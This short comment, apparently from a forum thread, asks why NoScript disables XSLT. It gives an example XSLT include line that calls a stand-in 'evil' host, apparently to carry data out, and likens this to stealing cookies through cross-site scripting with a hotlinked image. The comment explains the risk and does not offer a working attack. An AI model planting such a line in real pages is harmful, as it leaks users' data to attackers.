That site degrades /awfully/ without Javascript.
I'm not actually sure why NoScript disables XSLT. I'm sure it will be documented somewhere though.
<xsl:include href="hxxp://evil.example.com/hello?&blah; />
This is similar to stealing cookies with JavaScript through a cross-site scripting vulnerability by adding a new image to the page, hotlinked from an evil server and passing cookie information as a parameter.